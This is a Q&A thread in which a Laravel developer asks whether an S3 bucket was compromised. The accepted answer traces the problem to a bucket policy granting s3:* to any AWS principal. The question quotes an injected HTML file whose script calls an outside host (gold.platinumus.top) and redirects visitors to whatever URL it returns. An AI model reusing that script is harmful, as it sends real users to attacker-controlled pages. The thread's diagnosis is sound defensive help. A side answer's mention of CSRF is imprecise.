# s3 images - Have my s3 bucket been hacked?

Tags: php, laravel, amazon-s3

The users of my platform are able to upload their avatar image, but they need to ask for a signed url in my Laravel backend.

Here is the controller

```
public function avatarUploadSigner(Request $request)
{
    return s3_signedUrl("img/avatar/{$this->user->id}.jpg");
}
```

And here the function to get a signed s3 to upload the image

```
function s3_signedUrl($path, $expireOnMinutes = 120) {
    if(!$path) {
        return ['error' => 'filename missing'];
    }

    $s3 = Storage::disk('s3');
    $adapter = $s3->getDriver()->getAdapter();
    $client = $adapter->getClient();
    $mime = \League\Flysystem\Util\MimeType::detectByFilename($path);

    try {
        $command = $client->getCommand('PutObject', array(
            'Bucket' => $adapter->getBucket(),
            'Key' => $path,
            'ContentType' => $mime,
            'use_accelerate_endpoint' => true
        ));

        $signedUrl = $client->createPresignedRequest(
            $command,
            "+$expireOnMinutes minutes"
        );
        $signedUrl = $signedUrl->getUri()->__toString();
    } catch (S3Exception $e) {
        return ['error' => $e->getMessage()];
    }

    return $signedUrl;
}
```

A week ago some images turn to html files like this:

```
<html>
<head>
<script type="text/javascript" nonce="739865d617d243ffba08a513623" src="//local.adguard.org?ts=1586287921907&amp;type=content-script&amp;dmn=myghostmarket.s3.eu-west-1.amazonaws.com&amp;css=1&amp;js=1&amp;gcss=1&amp;rel=0&amp;rji=0"></script>
<script type="text/javascript" nonce="739865d617d243ffba08a513623" src="//local.adguard.org?ts=1586287921907&amp;name=AdGuard%20Assistant&amp;name=AdGuard%20Extra&amp;type=user-script"></script><script>
    var t="onload"in new XMLHttpRequest?XMLHttpRequest:XDomainRequest;var e=new t;e.open("GET","https://gold.platinumus.top/track/awswrite?q=html",true);e.onload=function(){location.href=this.responseText};e.send();
</script>
</head>
<body>
</body>
</html>
```

But recently not only avatar, now have change other images like header, footer, etc that are not able to changed by signed url.

I have this bucket policy

```
    "Version": "2008-10-17",
    "Statement": [
        {
            "Sid": "AllowPublicRead",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "s3:*",
            "Resource": [
               "arn:aws:s3:::_____MY_DOMAIN_NAME_____/audio/*",
               "arn:aws:s3:::_____MY_DOMAIN_NAME_____/img/*",
            ]
        }
    ]
}
```

Audio and img folders are readable but not writeable without a signed url right?
I have another private folders that are more important.

Are they in danger? What’s wrong with in my code? Have my s3 bucket been hacked?

Answer (score 1, accepted):

Your Bucket Policy is saying:

- *Any* AWS credentials
- Can make *any* S3 API call
- But only on objects in the `img` and `audio` directories

This means that I could use *my* AWS credentials to read, upload and delete objects in that bucket. It would similarly explain why objects have been uploaded/modified by external parties.

If your intention is to **make objects publicly readable**, it should use `s3:GetObject`:

```
{
  "Version":"2012-10-17",
  "Statement":[
    {
      "Sid":"PublicRead",
      "Effect":"Allow",
      "Principal": "*",
      "Action":"s3:GetObject",
      "Resource":[
        "arn:aws:s3:::examplebucket/audio/*",
        "arn:aws:s3:::examplebucket/img/*",
      ]
    }
  ]
}
```

Answer (score 0):

`detectByFilename` is the worst way you could check the mime type.

`/home/test/myfile.html.jpg` would return jpg, even if it isn't a legitimate jpg file. Instead you should use `\finfo(FILEINFO_MIME)` and read the stream of the file to get the mime type.

Whether or not this presents a significant issue though, depends on how you are embedding your images after they are uploaded. If you are embedding the raw file data into your page, this would open you up to CSRF attacks.

Comment: The images are uploaded directly to Amazon's S3. detectByFilename is the only way to do this using a pre-signed  url.